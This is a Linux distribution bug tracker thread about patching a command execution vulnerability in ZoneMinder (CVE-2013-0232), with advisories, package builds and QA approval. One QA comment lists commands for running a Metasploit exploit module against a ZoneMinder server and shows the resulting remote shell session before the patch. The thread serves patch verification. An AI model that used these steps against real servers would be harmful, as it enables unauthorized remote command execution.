Debian has issued an advisory on March 14: http://www.debian.org/security/2013/dsa-2640 Reproducible: Steps to Reproduce:
CC: (none) => zen25000Assignee: bugsquad => zen25000Whiteboard: (none) => MGA2TOO
(In reply to David Walser from comment #0) > Debian has issued an advisory on March 14: > http://www.debian.org/security/2013/dsa-2640 Thanks for bringing to my attention. CVE-2013-0332 This is already handled upstream in the source tarball that we are using in both 2 and Cauldron. CVE-2013-0232 I have patched both 2 and Cauldron versions locally and am testing builds of both before pushing to Cauldron and 2/updates-testing.
############################ Advisory zoneminder packages have been updated for the following vulnerability. CVE-2013-0232 zoneminder is prone to an arbitrary command execution vulnerability. Remote (authenticated) attackers could execute arbitrary commands as the web server user. References: http://www.zoneminder.com/forums/viewtopic.php?f=29&t=20771 http://itsecuritysolutions.org/2013-01-22-ZoneMinder-Video-Server-arbitrary-command-execution-vulnerability/ https://bugzilla.redhat.com/show_bug.cgi?id=904104 Updated packages in 2/core/updates_testing: ======================== zoneminder-1.25.0-10.2.mga2.x86_64.rpm zoneminder-1.25.0-10.2.mga2.i586.rpm Source rpm: zoneminder-1.25.0-10.2.mga2.src.rpm Note: This will need pushing to tainted as well as core when accepted.
Thanks. (In reply to Barry Jackson from comment #2) > Note: > This will need pushing to tainted as well as core when accepted. Then you'll need to push a build to tainted. mgarepo submit zoneminder --define section=tainted/release mgarepo 2/zoneminder --define section=tainted/updates_testing -t 2
I already did for cauldron - now done for 2 as well.
Thanks Barry! Assigning to QA. Advisory: ======================== Updated zoneminder package fixes security vulnerability: zoneminder is prone to an arbitrary command execution vulnerability. Remote (authenticated) attackers could execute arbitrary commands as the web server user (CVE-2013-0232). References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0232 http://www.zoneminder.com/forums/viewtopic.php?f=29&t=20771 http://itsecuritysolutions.org/2013-01-22-ZoneMinder-Video-Server-arbitrary-command-execution-vulnerability/ https://bugzilla.redhat.com/show_bug.cgi?id=904104 http://www.debian.org/security/2013/dsa-2640 ======================== Updated packages in {core,tainted}/updates_testing: ======================== zoneminder-1.25.0-10.2.mga2 from zoneminder-1.25.0-10.2.mga2.src.rpm
Version: Cauldron => 2Assignee: zen25000 => qa-bugsWhiteboard: MGA2TOO => (none)
There are two srpms zoneminder-1.25.0-10.2.mga2.src.rpm zoneminder-1.25.0-10.2.mga2.tainted.src.rpm Testing x86_64 Before ------ Confirmed vulnerable using the module in metasploit from git $ mkdir metasploit $ cd metasploit $ git clone https://github.com/bcoles/metasploit-framework.git $ cd metasploit-framework $ ./msfconsole -L At msf prompt msf > use exploit/unix/webapp/zoneminder_packagecontrol_exec msf exploit(zoneminder_packagecontrol_exec) > set RHOST <IP of zoneminder server> If you've set a login on zoneminder also set USERNAME and set PASSWORD msf exploit(zoneminder_packagecontrol_exec) > exploit [*] ServerIP:80 - Authenticating as user 'username' [*] Started reverse double handler [+] ServerIP:80 - Authenticated successfully [*] ServerIP:80 - Sending payload (525 bytes) [+] ServerIP:80 - Payload sent successfully [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo bP9pMxbEZnF9eZC9; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: "bP9pMxbEZnF9eZC9\r\n" [*] Matching... [*] B is input... [*] ServerIP - Command shell session 1 opened at Sat Mar 16 18:33:13 +0000 2013 ls ajax cambozola.jar css events graphics images includes index.php js lang mootools-1.2.3-core-yc.js mootools.js skins sounds temp tools views ^C Abort session 1? [y/N] y [*] Command shell session 1 closed. Reason: User exit msf exploit(zoneminder_packagecontrol_exec) > quit After ----- msf exploit(zoneminder_packagecontrol_exec) > exploit [*] Started reverse double handler [*] ServerIP:80 - Authenticating as user 'username' [+] ServerIP:80 - Authenticated successfully [*] ServerIP:80 - Sending payload (525 bytes) [+] ServerIP:80 - Payload sent successfully msf exploit(zoneminder_packagecontrol_exec) > quit Tested again with zoneminder from tainted updates testing - OK No regressions noticed. Adding bug 2317 for links required from core release to tainted updates testing Running checks for "zoneminder" using media "Core Release" and "Tainted Updates Testing". ---------------------------------------- Mageia release 2 (Official) for x86_64 Latest version found in "Core Release" is zoneminder-1.25.0-10.mga2 Latest version found in "Tainted Updates Testing" is zoneminder-1.25.0-10.2.mga2.tainted ---------------------------------------- The following packages will require linking: lame-3.99.5-1.mga2.tainted (Tainted Release) libatk1.0_0-2.4.0-1.mga2 (Core 32bit Release) libbzip2_1-1.0.6-1.mga2 (Core 32bit Release) libcairo2-1.10.2-6.mga2 (Core 32bit Release) libcairo-xcb2-1.10.2-6.mga2 (Core 32bit Release) libdatrie1-0.2.5-1.mga2 (Core 32bit Release) libfontconfig1-2.8.0-6.mga2 (Core 32bit Release) libgamin-1_0-0.1.10-8.mga2 (Core 32bit Release) libgnome-keyring0-3.4.1-1.mga2 (Core 32bit Release) libjasper1-1.900.1-13.mga2 (Core 32bit Release) liblzma5-5.0.3-3.mga2 (Core 32bit Release) libpcre0-8.21-1.mga2 (Core 32bit Release) libpng15_15-1.5.10-1.mga2 (Core 32bit Release) libsasl2-2.1.23-19.mga2 (Core 32bit Release) libsoup2.4_1-2.38.1-1.mga2 (Core 32bit Release) libthai0-0.1.14-1.mga1 (Core 32bit Release) libudev0-181-8.mga2 (Core 32bit Release) libxft2-2.3.0-1.mga2 (Core 32bit Release) libxrender1-0.9.7-1.mga2 (Core 32bit Release) ----------------------------------------
Depends on: (none) => 2317Whiteboard: (none) => has_procedure mga2-64-OK
Testing complete mga2 32 Advisory: ======================== Updated zoneminder package fixes security vulnerability: Zoneminder is prone to an arbitrary command execution vulnerability. Remote (authenticated) attackers could execute arbitrary commands as the web server user (CVE-2013-0232). References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0232 http://www.zoneminder.com/forums/viewtopic.php?f=29&t=20771 http://itsecuritysolutions.org/2013-01-22-ZoneMinder-Video-Server-arbitrary-command-execution-vulnerability/ https://bugzilla.redhat.com/show_bug.cgi?id=904104 http://www.debian.org/security/2013/dsa-2640 ======================== SRPM's: zoneminder-1.25.0-10.2.mga2.src.rpm zoneminder-1.25.0-10.2.mga2.tainted.src.rpm For bug 2317.. ---------------------------------------- The following packages will require linking: lame-3.99.5-1.mga2.tainted (Tainted Release) libatk1.0_0-2.4.0-1.mga2 (Core 32bit Release) libbzip2_1-1.0.6-1.mga2 (Core 32bit Release) libcairo2-1.10.2-6.mga2 (Core 32bit Release) libcairo-xcb2-1.10.2-6.mga2 (Core 32bit Release) libdatrie1-0.2.5-1.mga2 (Core 32bit Release) libfontconfig1-2.8.0-6.mga2 (Core 32bit Release) libgamin-1_0-0.1.10-8.mga2 (Core 32bit Release) libgnome-keyring0-3.4.1-1.mga2 (Core 32bit Release) libjasper1-1.900.1-13.mga2 (Core 32bit Release) liblzma5-5.0.3-3.mga2 (Core 32bit Release) libpcre0-8.21-1.mga2 (Core 32bit Release) libpng15_15-1.5.10-1.mga2 (Core 32bit Release) libsasl2-2.1.23-19.mga2 (Core 32bit Release) libsoup2.4_1-2.38.1-1.mga2 (Core 32bit Release) libthai0-0.1.14-1.mga1 (Core 32bit Release) libudev0-181-8.mga2 (Core 32bit Release) libxft2-2.3.0-1.mga2 (Core 32bit Release) libxrender1-0.9.7-1.mga2 (Core 32bit Release) ---------------------------------------- Could sysadmin please push from core & tainted updates testing to core & tainted updates and also make the required links for bug 2317. Thanks!
Keywords: (none) => validated_updateWhiteboard: has_procedure mga2-64-OK => has_procedure mga2-64-OK mga2-32-okCC: (none) => sysadmin-bugs
Packages linked and update pushed: https://wiki.mageia.org/en/Support/Advisories/MGASA-2013-0104
Status: NEW => RESOLVEDCC: (none) => tmbResolution: (none) => FIXED